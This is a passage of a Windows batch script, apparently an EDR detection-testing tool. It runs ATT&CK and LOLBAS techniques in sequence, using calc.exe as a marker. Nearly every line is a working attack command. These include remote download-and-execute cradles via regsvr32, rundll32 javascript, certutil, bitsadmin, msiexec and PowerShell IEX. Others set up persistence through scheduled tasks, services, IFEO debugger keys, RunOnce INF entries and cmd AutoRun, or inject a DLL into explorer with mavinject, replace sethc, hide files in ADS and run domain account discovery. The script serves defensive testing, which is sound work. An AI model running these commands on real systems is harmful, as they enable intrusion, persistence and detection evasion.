 157 | echo Execution Finished at %time% %date%
 158 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regasm.exe /U AllTheThings.dll
 159 | 
 160 | timeout 5
 161 | 
 162 | echo %time% %date% [+] T1121 - Testing regasm x64
 163 | start "" cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
 164 | echo Execution Finished at %time% %date%
 165 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThings.dll
 166 | start "" cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
 167 | echo Execution Finished at %time% %date%
 168 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThings.dll
 169 | 
 170 | timeout 5
 171 | 
 172 | echo %time% %date% [+] T1117 -  Testing regsvr32
 173 | start "" cmd /c regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
 174 | echo Execution Finished at %time% %date%
 175 | echo Command Excuted: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll
 176 | 
 177 | timeout 5
 178 | 
 179 | echo %time% %date% [+] T1127 - Testing MSBuild
 180 | 
 181 | echo ^<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"^> > xxxFile.csproj
 182 | echo    ^<ItemGroup^>   >> xxxFile.csproj
 183 | echo         ^<Binaries Include="*.dll;*.exe"/^>   >> xxxFile.csproj
 184 | echo     ^</ItemGroup^>   >> xxxFile.csproj
 185 | echo   ^<Target Name="SetACL"^>   >> xxxFile.csproj
 186 | echo         ^<Exec Command="calc.exe"/^>   >> xxxFile.csproj
 187 | echo     ^</Target^>   >> xxxFile.csproj
 188 | echo ^</Project^>   >> xxxFile.csproj
 189 | 
 190 | start "" cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj
 191 | echo Execution Finished at %time% %date%
 192 | echo Command Excuted: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj
 193 | 
 194 | timeout 5
 195 | 
 196 | echo %time% %date% [+] T1047 - Testing wmic download
 197 | start "" cmd /c wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
 198 | echo Execution Finished at %time% %date%
 199 | echo Command Excuted: wmic process get brief /format:"https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"
 200 | 
 201 | timeout 5
 202 | 
 203 | echo %time% %date% [+] T1128 - Testing netsh.exe dll exec 
 204 | start "" cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    
 205 | start "" cmd /c netsh trace show status    
 206 | start "" cmd /c netsh.exe add helper AllTheThings.dll
 207 | start "" cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
 208 | start "" cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
 209 | start "" cmd /c netsh trace stop
 210 | echo Execution Finished at %time% %date%
 211 | echo Command Excuted: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl    
 212 | echo Command Excuted: netsh trace show status 
 213 | echo Command Excuted: netsh.exe add helper AllTheThings.dll
 214 | echo Command Excuted: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1
 215 | echo Command Excuted: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
 216 | echo Command Excuted: netsh trace stop
 217 | 
 218 | timeout 5
 219 |  
 220 | echo %time% %date% [+] T1085 - Testing rundll32 execution
 221 | start "" cmd /c rundll32 AllTheThings.dll,EntryPoint
 222 | echo Execution Finished at %time% %date%
 223 | echo Command Excuted: rundll32 AllTheThings.dll,EntryPoint
 224 | 
 225 | timeout 5
 226 | 
 227 | echo %time% %date% [+] T1085 - Testing rundll32 download & exec
 228 | start "" cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
 229 | echo Execution Finished at %time% %date%
 230 | echo Command Excuted: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test")
 231 | 
 232 | timeout 5
 233 | 
 234 | echo %time% %date% [+] T1085 - Testing rundll32 exec
 235 | start "" cmd /c rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
 236 | echo Execution Finished at %time% %date%
 237 | echo Command Excuted: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe && exit",0,true);}
 238 | timeout 5
 239 | 
 240 | echo %time% %date% [+] T1130 - Testing certutil download 
 241 | start "" cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1  
 242 | echo Execution Finished at %time% %date%
 243 | echo Command Excuted: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt Default_File_Path2.ps1
 244 | timeout 5
 245 | 
 246 | echo %time% %date% [+] T1191 - Testing cmstp download
 247 | start "" cmd /c cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf
 248 | echo Execution Finished at %time% %date%
 249 | echo Command Excuted: cmstp.exe /ni /s https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp.inf
 250 | timeout 5
 251 | echo %time% %date% [+] T1202 - Indirect Command Execution
 252 | start "" cmd /c forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
 253 | echo Execution Finished at %time% %date%
 254 | echo Command Excuted: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
 255 | timeout 5
 256 | echo %time% %date% [+] T1028 - Testing Windows Remoting exec
 257 | start "" cmd /c winrm qc -q 
 258 | start "" cmd /c winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
 259 | echo Execution Finished at %time% %date%
 260 | echo Command Excuted: winrm qc -q 
 261 | echo Command Excuted: winrm i c wmicimv2/Win32_Process @{CommandLine="calc"}
 262 | timeout 5
 263 | echo %time% %date% [+] T1053 - Adding Scheduled Task exec ONLOGON
 264 | start "" cmd /c schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System" /f
 265 | echo Execution Finished at %time% %date%
 266 | echo Command Excuted: schtasks /create /tn "mysc" /tr C:\windows\system32\calc.exe /sc ONLOGON /ru "System"
 267 | timeout 5
 268 | echo %time% %date% [+] T1216 - Signed Script Proxy Execution
 269 | start "" cmd /c cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
 270 | echo Execution Finished at %time% %date%
 271 | echo Command Excuted: cscript /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct
 272 | timeout 5
 273 | echo %time% %date% [+] T1218 / T1055 - Signed Binary Proxy Execution
 274 | start "" cmd /c  for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Imagename eq explorer.exe^" ^| find ^"explorer^"') do C:\Windows\system32\mavinject.exe %B /INJECTRUNNING AllTheThings.dll
 275 | echo Command Excuted: for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Imagename eq explorer.exe^" ^| find ^"explorer^"') do C:\Windows\system32\mavinject.exe %B /INJECTRUNNING AllTheThings.dll
 276 | start "" cmd /c  for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Imagename eq explorer.exe^" ^| find ^"explorer^"') do C:\Windows\SysWOW64\mavinject.exe %B /INJECTRUNNING AllTheThings.dll
 277 | echo Command Excuted:  for /f "tokens=1,2 delims= " %A in ('tasklist /fi ^"Imagename eq explorer.exe^" ^| find ^"explorer^"') do C:\Windows\SysWOW64\mavinject.exe %B /INJECTRUNNING AllTheThings.dll
 278 | echo Execution Finished at %time% %date%
 279 | timeout 5
 280 | echo %time% %date% [+] T1033 - System Owner/User Discovery
 281 | start "" cmd.exe /c whoami
 282 | start "" wmic useraccount get /ALL
 283 | start "" cmd.exe /c net group "domain administrators" /domain
 284 | start "" cmd.exe /c whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
 285 | echo Execution Finished at %time% %date%
 286 | echo Command Excuted: cmd.exe /C whoami
 287 | echo Command Excuted: wmic useraccount get /ALL
 288 | echo Command Excuted: cmd.exe /C net group "domain administrators" /domain
 289 | 
 290 | timeout 5
 291 | echo %time% %date% [+] T1158 - Hiding data in ADS
 292 | echo "test123 > 12.txt
 293 | echo "test" > 12.txt:12
 294 | echo Execution Finished at %time% %date%
 295 | echo Command Excuted: echo "test123 > 12.txt
 296 | echo Command Excuted: echo "test123 > 12.txt
 297 | timeout 5
 298 | echo %time% %date% [+] T1183 - Exec via File Execution Options
 299 | 
 300 | start "" cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v Debugger /d "C:\windows\system32\calc.exe"
 301 | start "" cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v GlobalFlag /t REG_DWORD /d 512 
 302 | start "" cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /v ReportingMode /t REG_DWORD /d 1 
 303 | start "" cmd /c REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /v MonitorProcess /d "C:\windows\system32\calc.exe"
 304 | echo Execution Finished at %time% %date%
 305 | echo Command Excuted: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v Debugger /d "calc.exe"
 306 | echo Command Excuted: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\paint.exe" /v GlobalFlag /t REG_DWORD /d 512 
 307 | echo Command Excuted: REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\paint.exe" /v MonitorProcess /d "calc.exe"
 308 | timeout 5
 309 | echo %time% %date% [+] T1096 - NTFS File Attributes
 310 | type C:\windows\system32\cmd.exe > "123.txt:evil.exe"
 311 | start "" cmd /c certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct testADS.txt:test
 312 | echo Execution Finished at %time% %date%
 313 | echo Command Excuted: type C:\windows\system32\cmd.exe > "123.txt:evil.exe"
 314 | echo Command Excuted: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test.sct testADS.txt:test
 315 | timeout 5
 316 | 
 317 | echo %time% %date% [+] T1015 - Sethc replacement
 318 | copy /Y C:\windows\system32\sethc.exe C:\windows\system32\sethc.bac
 319 | copy /Y C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe
 320 | copy /Y C:\windows\system32\sethc.bac C:\windows\system32\sethc.exe
 321 | echo Execution Finished at %time% %date%
 322 | echo Command Excuted: C:\windows\system32\setsh.exe C:\windows\system32\setsh.bac
 323 | echo Command Excuted: C:\windows\system32\cmd.exe C:\windows\system32\setsh.exe
 324 | echo Command Excuted: C:\windows\system32\setsh.bac C:\windows\system32\setsh.exe
 325 | 
 326 | timeout 5
 327 | 
 328 | echo %time% %date% [+] T1138 - App Shim installation for Calc.exe via file decode
 329 | echo -----BEGIN CERTIFICATE----- > shim.64
 330 | echo AgAAAAEAAABzZGJmAnjeAAAAA3ggAAAAAjgHcAM4AWAWQAEAAAABmAwAAABFWEUu >> shim.64
 331 | echo Q0xBQ1IBAAADeA4AAAACOAdwAzgLYAGYAAAAAAN4DgAAAAI4B3ADOCBgAZgAAAAA >> shim.64
 332 | echo A3gOAAAAAjgEcAM4AWABmAAAAAADeA4AAAACOA1wAzgVQAGYAAAAAAN4FAAAAAI4 >> shim.64
 333 | echo EHADOAFgFkABAAAAAZgAAAAAA3gOAAAAAjgScAM4BpABmAAAAAADeBQAAAACOBJw >> shim.64
 334 | echo AzgEkBZAAQAAAAGYAAAAAAN4GgAAAAI4B3ADOASQAZgMAAAAKrpBuRQxAq9SAQAA >> shim.64
 335 | echo AXDgAAAAAVAJOgQMVR/UASJgBgAAAAFgHAAAACNAAQAAAAeQEAAAAO/VHM+BZc5A >> shim.64
 336 | echo oCyA7S3ObrkCcAAAAAALcB4AAAABYHAAAAAJcAYAAAABYIAAAAAJcAYAAAABYLoA >> shim.64
 337 | echo AAAHcH4AAAABYNgAAAAGYHAAAAAFYPAAAAAEkBAAAACpg6GdMzlyTIM54CQnCHDj >> shim.64
 338 | echo CHAyAAAAAWAKAQAACWAUAQAAEGBGAQAAEWCWAQAAAlBqRLEdAQAGAANQakSxHQEA >> shim.64
 339 | echo BgATYLoBAAAJcAwAAAABYLoAAAAIYNgAAAALcAYAAAABYBICAAABeCQCAAABiBAA >> shim.64
 340 | echo AAAyAC4AMQAuADAALgAzAAAAAYhOAAAAewBjAGYAMQBjAGQANQBlAGYALQA2ADUA >> shim.64
 341 | echo OAAxAC0ANAAwAGMAZQAtAGEAMAAyAGMALQA4ADAAZQBkADIAZABjAGUANgBlAGIA >> shim.64
 342 | echo OQB9AAAAAYgKAAAAYwBhAGwAYwAAAAGINAAAAEEAZABkAFAAcgBvAGMAZQBzAHMA >> shim.64
 343 | echo UABhAHIAYQBtAGUAdABlAHIAcwBGAGwAYQBnAHMAAAABiBgAAABSAGUAZABpAHIA >> shim.64
 344 | echo ZQBjAHQARQBYAEUAAAABiBIAAABjAGEAbABjAC4AZQB4AGUAAAABiBQAAABNAGkA >> shim.64
 345 | echo YwByAG8AcwBvAGYAdAAAAAGIBAAAACoAAAABiCwAAABNAGkAYwByAG8AcwBvAGYA >> shim.64
 346 | echo dAAgAEMAbwByAHAAbwByAGEAdABpAG8AbgAAAAGISgAAAE0AaQBjAHIAbwBzAG8A >> shim.64
 347 | echo ZgB0AK4AIABXAGkAbgBkAG8AdwBzAK4AIABPAHAAZQByAGEAdABpAG4AZwAgAFMA >> shim.64
 348 | echo eQBzAHQAZQBtAAAAAYgeAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzAAAA >> shim.64
 349 | echo AYhSAAAANgAuADEALgA3ADYAMAAxAC4AMgAzADQAMAAzACAAKAB3AGkAbgA3AHMA >> shim.64
 350 | echo cAAxAF8AbABkAHIALgAxADYAMAAzADIANQAtADAANgAwADAAKQAAAAGIEgAAAFYA >> shim.64
 351 | echo aQBzAHQAYQBTAFAAMQAAAA== >> shim.64
 352 | echo -----END CERTIFICATE----- >> shim.64
 353 | start "" cmd /c certutil -f -decode shim.64 calc.sdb >nul
 354 | start "" cmd /c sdbinst /q calc.sdb
 355 | timeout 2
 356 | start "" cmd /c sdbinst -u calc.sdb
 357 | echo Execution Finished at %time% %date% 
 358 | echo Command Excuted: certutil -f -decode shim.64 calc.sdb
 359 | echo Command Excuted: sdbinst -q calc.sdb
 360 | echo Command Excuted: sdbinst -u calc.sdb
 361 | 
 362 | timeout 5
 363 | 
 364 | echo %time% %date% [+] T1138 - App Shim installation for Calc.exe via file download
 365 | 
 366 | start "" cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/calc-exec.sdb "%cd%\calc2.sdb"
 367 | start "" cmd /c sdbinst /q calc2.sdb
 368 | timeout 2
 369 | start "" cmd /c sdbinst -u calc2.sdb
 370 | echo Execution Finished at %time% %date% 
 371 | echo Command Excuted: sdbinst -q calc2.sdb
 372 | echo Command Excuted: sdbinst -u calc2.sdb
 373 | 
 374 | timeout 5
 375 | 
 376 | 
 377 | echo **********************************************
 378 | echo *      Testing LOLBAS PAYLOADS               *
 379 | echo **********************************************
 380 | REM Payloads in this section were generated based on information in https://github.com/api0cradle/LOLBAS
 381 | 
 382 | echo %time% %date% [+] Testing msiexec exec
 383 | start "" cmd /c msiexec /q /i https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true  
 384 | start "" cmd /c msiexec /i https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true
 385 | echo Execution Finished at %time% %date%
 386 | echo Command Excuted: msiexec /q /i https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true 
 387 | echo Command Excuted: msiexec /i https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true
 388 | timeout 5
 389 | echo %time% %date% [+] Testing diskshadow exec
 390 | echo exec calc.exe > diskshadow.txt
 391 | start "" cmd /c  diskshadow.exe /s diskshadow.txt
 392 | echo Execution Finished at %time% %date%  
 393 | echo Command Excuted: exec calc.exe > diskshadow.txt
 394 | echo Command Excuted: diskshadow.exe /s diskshadow.txt
 395 | timeout 5
 396 | echo %time% %date% [+] Testing Esentutl.exe download & exec
 397 | start "" cmd /c  esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o  
 398 | start "" cmd /c  adrestore.exe   
 399 | echo Execution Finished at %time% %date%  
 400 | echo Command Excuted: esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d adrestore.exe /o
 401 | echo Command Excuted: adrestore.exe
 402 | timeout 5
 403 | echo %time% %date% [+] Testing replace.exe download & exec
 404 | start "" cmd /c replace \\live.sysinternals.com\tools\adrestore.exe adrestore2.exe /A
 405 | start "" cmd /c adrestore2.exe   
 406 | echo Execution Finished at %time% %date% 
 407 | echo Command Excuted: replace \\live.sysinternals.com\tools\adrestore.exe adrestore2.exe /A
 408 | echo Command Excuted: adrestore2.exe  
 409 | timeout 5
 410 | echo %time% %date% [+] Testing SyncAppvPublishingServer.vbs download & exec
 411 | start "" cmd /c  C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
 412 | echo Execution Finished at %time% %date% 
 413 | echo Command Excuted: C:\Windows\System32\SyncAppvPublishingServer.vbs "n;(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"
 414 | timeout 5
 415 | echo %time% %date% [+] Testing HH.exe download
 416 | REM HH.exe does not handle HTTPS
 417 | start "" cmd /c  HH.exe http://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt
 418 | echo Execution Finished at %time% %date% 
 419 | echo Command Excuted: HH.exe http://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt
 420 | timeout 5
 421 | echo %time% %date% Testing ieexec.exe download & execute"exec"
 422 | start "" cmd /c  ieexec.exe https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true  
 423 | echo Execution Finished at %time% %date% 
 424 | echo Command Excuted: ieexec.exe https://github.com/op7ic/EDR-Testing-Script/blob/master/Payloads/notepad.msi?raw=true  
 425 | timeout 5
 426 | echo %time% %date% [+] Testing Setupapi driever installation & exec
 427 | echo ^; DRIVER.INF > calc.inf
 428 | echo ^; Copyright (c) Microsoft Corporation.  All rights reserved. >> calc.inf
 429 | echo [Version] >> calc.inf
 430 | echo Signature = "$CHICAGO$" >> calc.inf
 431 | echo Class=61883 >> calc.inf
 432 | echo ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} >> calc.inf
 433 | echo Provider=%Msft% >> calc.inf
 434 | echo DriverVer=06/21/2006,6.1.7600.16385 >> calc.inf
 435 | echo [DestinationDirs] >> calc.inf
 436 | echo DefaultDestDir = 1 >> calc.inf
 437 | echo [DefaultInstall] >> calc.inf
 438 | echo AddReg = CalcStart >> calc.inf
 439 | echo [CalcStart]
 440 | echo HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" >> calc.inf
 441 | 
 442 | start "" cmd /c rundll32 setupapi,InstallHinfSection DefaultInstall 132 calc.inf
 443 | echo Execution Finished at %time% %date% 
 444 | echo Command Excuted: rundll32 setupapi,InstallHinfSection DefaultInstall 132 calc.inf
 445 | timeout 5
 446 | 
 447 | echo %time% %date% [+] Testing Shdocvw exec via rundll32
 448 | echo [InternetShortcut] > C:\windows\temp\url.url
 449 | echo URL=file:///c:\windows\system32\calc.exe >> C:\windows\temp\url.url
 450 | start "" cmd /c rundll32.exe shdocvw.dll, OpenURL C:\windows\temp\url.url
 451 | echo Execution Finished at %time% %date%
 452 | echo Command Excuted: [InternetShortcut] > C:\windows\temp\url.url
 453 | echo Command Excuted: URL=file:///c:\windows\system32\calc.exe >> C:\windows\temp\url.url
 454 | echo Command Excuted: rundll32.exe shdocvw.dll, OpenURL C:\windows\temp\url.url
 455 | 
 456 | timeout 5
 457 | 
 458 | echo %time% %date% [+] Testing csc exec
 459 | 
 460 | echo public class x{public static void Main(){System.Diagnostics.Process.Start("calc");}} >>  payload.cs
 461 | 
 462 | start "" cmd /c  C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe payload.cs
 463 | start "" cmd /c  C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /out:payload.exe payload.cs
 464 | start "" cmd /c  C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 465 | start "" cmd /c  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 466 | start "" cmd /c  payload.exe
 467 | echo Execution Finished at %time% %date%
 468 | echo Command Excuted: public class x{public static void Main(){System.Diagnostics.Process.Start("calc");}} >>  payload.cs
 469 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /out:payload.exe payload.cs
 470 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe /out:payload.exe payload.cs
 471 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 472 | echo Command Excuted: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe /out:payload.exe payload.cs
 473 | echo Command Excuted: payload.exe 
 474 | timeout 5
 475 | echo %time% %date% [+] Testing advpack exec
 476 | start "" cmd /c rundll32.exe advpack.dll,RegisterOCX calc.exe
 477 | echo Execution Finished at %time% %date%
 478 | echo Command Excuted: rundll32.exe advpack.dll,RegisterOCX calc.exe
 479 | timeout 5
 480 | echo %time% %date% [+] Testing Scriptrunner exec
 481 | start "" cmd /c scriptrunner.exe -appvscript calc.exe   
 482 | echo Execution Finished at %time% %date%
 483 | echo Command Excuted: scriptrunner.exe -appvscript calc.exe
 484 | 
 485 | timeout 5
 486 | 
 487 | echo %time% %date% [+] Testing SC exec
 488 | start "" cmd /c sc create evilservice binPath= "C:\windows\system32\calc.exe" DisplayName= "evilservice" start= auto     
 489 | start "" cmd /c sc start evilservice     
 490 | echo Execution Finished at %time% %date%
 491 | echo Command Excuted: sc create evilservice binPath= "C:\windows\system32\cmd.exe /c calc.exe" DisplayName= "evilservice" start= auto  
 492 | echo Command Excuted: sc start evilservice
 493 | 
 494 | timeout 5
 495 | 
 496 | echo %time% %date% [+] Testing Register-cimprovider exec
 497 | start "" cmd /c Register-cimprovider -path "AllTheThings.dll"   
 498 | echo Execution Finished at %time% %date%
 499 | echo Command Excuted: Register-cimprovider -path "AllTheThings.dll"   
 500 | 
 501 | timeout 5
 502 | 
 503 | echo %time% %date% [+] Testing control.exe exec
 504 | start "" cmd /c control.exe AllTheThings.dll
 505 | echo Execution Finished at %time% %date%
 506 | echo Command Excuted: control.exe AllTheThings.dll
 507 | 
 508 | 
 509 | timeout 5
 510 | 
 511 | echo %time% %date% [+] Testing manage-bde.wsf exec
 512 | set comspec=C:\windows\system32\calc.exe
 513 | start "" cmd /c cscript C:\windows\system32\manage-bde.wsf 
 514 | echo Execution Finished at %time% %date%
 515 | echo Command Excuted: set comspec=C:\windows\system32\calc.exe
 516 | echo Command Excuted: cscript C:\windows\system32\manage-bde.wsf 
 517 | REM Reset ComSpec
 518 | set comspec=C:\WINDOWS\system32\cmd.exe
 519 | 
 520 | timeout 5
 521 | 
 522 | echo %time% %date% [+] Testing AppVLP.exe exec
 523 | start "" cmd /c "C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
 524 | echo Execution Finished at %time% %date%
 525 | echo Command Excuted: "C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
 526 | 
 527 | timeout 5
 528 | 
 529 | echo %time% %date% [+] Testing ScriptRunner.exe exec
 530 | start "" cmd /c C:\Windows\System32\ScriptRunner.exe -appvscript cmd.exe
 531 | echo Execution Finished at %time% %date%
 532 | echo Command Excuted: C:\Windows\System32\ScriptRunner.exe -appvscript calc.exe
 533 | 
 534 | timeout 5
 535 | 
 536 | echo %time% %date% [+] Testing Pester.bat (PS3.0) exec
 537 | start "" cmd /c C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat help  "; Start-Process calc.exe"
 538 | echo Execution Finished at %time% %date%
 539 | echo Command Excuted: C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat help  "; Start-Process calc.exe"
 540 | 
 541 | timeout 5
 542 | 
 543 | echo %time% %date% [+] Testing powershellcustomhost.exe exec
 544 | echo Start-Process calc.exe > calc.ps1
 545 | start "" cmd /c "C:\Program Files\IIS\Microsoft Web Deploy V3\Scripts\powershellcustomhost.exe" calc.ps1
 546 | echo Execution Finished at %time% %date%
 547 | echo Command Excuted: "C:\Program Files\IIS\Microsoft Web Deploy V3\Scripts\powershellcustomhost.exe" calc.ps1
 548 | 
 549 | timeout 5
 550 | 
 551 | echo %time% %date% [+] Testing PresentationHosts.exe exec
 552 | start "" cmd /c PresentationHost.exe file://c:\windows\system32\calc.exe
 553 | echo Execution Finished at %time% %date%
 554 | echo Command Excuted: PresentationHost.exe file://c:\windows\system32\calc.exe
 555 | timeout 5
 556 | 
 557 | 
 558 | echo %time% %date% [+] Testing Command Processor.exe exec
 559 | start "" cmd /c reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /d "start calc.exe"
 560 | start "" cmd /c cmd.exe
 561 | echo Execution Finished at %time% %date%
 562 | echo Command Excuted: reg add "HKCU\Software\Microsoft\Command Processor" /v AutoRun /d "start calc.exe"
 563 | echo Command Excuted: cmd.exe
 564 | timeout 5
 565 | 
 566 | echo %time% %date% [+] Testing gpup.exe exec
 567 | start "" cmd /c "C:\Program Files (x86)\Notepad++\updater\gpup.exe -w whatever -e c:\Windows\System32\calc.exe"
 568 | echo Execution Finished at %time% %date%
 569 | echo Command Excuted: C:\Program Files (x86)\Notepad++\updater\gpup.exe -w whatever -e c:\Windows\System32\calc.exe
 570 | 
 571 | timeout 5
 572 | 
 573 | echo ^; DRIVER.INF > calc2.inf
 574 | echo ^; Copyright (c) Microsoft Corporation.  All rights reserved. >> calc2.inf
 575 | echo [Version] >> calc2.inf
 576 | echo Signature = "$CHICAGO$" >> calc2.inf
 577 | echo Class=61883 >> calc2.inf
 578 | echo ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17} >> calc2.inf
 579 | echo Provider=%Msft% >> calc2.inf
 580 | echo DriverVer=06/21/2006,6.1.7600.16385 >> calc2.inf
 581 | echo [DestinationDirs] >> calc2.inf
 582 | echo DefaultDestDir = 1 >> calc2.inf
 583 | echo [DefaultInstall] >> calc2.inf
 584 | echo AddReg = CalcStart >> calc2.inf
 585 | echo [CalcStart] >> calc2.inf
 586 | echo HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce,Install,,cmd.exe /c """calc.exe""" >> calc2.inf
 587 | 
 588 | echo %time% %date% [+] Testing VBoxDrvInst.exe exec
 589 | start "" cmd /c "C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe" driver executeinf calc2.inf 
 590 | echo Execution Finished at %time% %date%
